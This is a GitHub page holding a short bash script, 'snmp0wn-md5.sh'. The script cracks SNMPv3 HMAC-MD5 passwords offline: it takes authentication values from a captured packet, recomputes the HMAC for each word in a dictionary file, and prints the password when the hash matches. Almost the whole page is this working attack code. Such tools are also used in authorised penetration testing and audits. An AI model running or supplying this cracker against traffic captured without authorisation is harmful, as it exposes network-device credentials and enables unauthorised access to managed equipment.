-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathsnmp0wn-md5.sh
executable file
·50 lines (43 loc) · 1.88 KB
/
snmp0wn-md5.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/bin/bash
# Variables
# EDIT THOSE VARIABLES BASED ON YOUR PACKET CAPTURE
msgAuthoritativeEngineID=""
msgAuthenticationParameters=""
msgWhole=""
# Constants
dictionary="dico.txt"
ipad="36363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636"
opad="5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c"
# Function
function CompareHashes() {
echo "Testing password: $password"
# USMHMACMD5 exploit
AuthKey=$(snmpkey md5 $password $msgAuthoritativeEngineID | grep authKey | cut -d ' ' -f 2 | cut -c 3-)
ExtAuthKey="${AuthKey}000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
K1=`echo "obase=16;ibase=16; xor(${ExtAuthKey^^},${ipad^^})" | BC_LINE_LENGTH=0 bc -l logic.bc`
K2=`echo "obase=16;ibase=16; xor(${ExtAuthKey^^},${opad^^})" | BC_LINE_LENGTH=0 bc -l logic.bc`
Hash_K1_msgWhole=$(echo -e -n $(echo -n ${K1,,}${msgWhole} | sed 's/../\\x&/g') | md5sum | awk '{print $1}')
Hash_K2_HashK1msgWhole=$(echo -e -n $(echo -n ${K2,,}${Hash_K1_msgWhole} | sed 's/../\\x&/g') | md5sum | awk '{print $1}')
TestmsgAuthenticationParameters=${Hash_K2_HashK1msgWhole:0:24}
# Uncomment below for debugging
#echo -e "DEBUG\n"
#echo "AuthKey=${AuthKey}"
#echo "ExtAuthKey=${ExtAuthKey}"
#echo "K1=${K1}"
#echo "K2=${K2}"
#echo "Hash_K1_msgWhole=${Hash_K1_msgWhole}"
#echo "Hash_K2_HashK1msgWhole=${Hash_K2_HashK1msgWhole}"
#echo "TestmsgAuthenticationParameters=${TestmsgAuthenticationParameters}"
if [ ${TestmsgAuthenticationParameters} == ${msgAuthenticationParameters} ]
then
# Hash matches, convey happy thoughts and exit
echo "Winner Winner, Chicken Dinner! "
echo "The password is: $password"
exit 0
fi
}
# Loop through the dictionary
while read password
do
CompareHashes
done < ./${dictionary}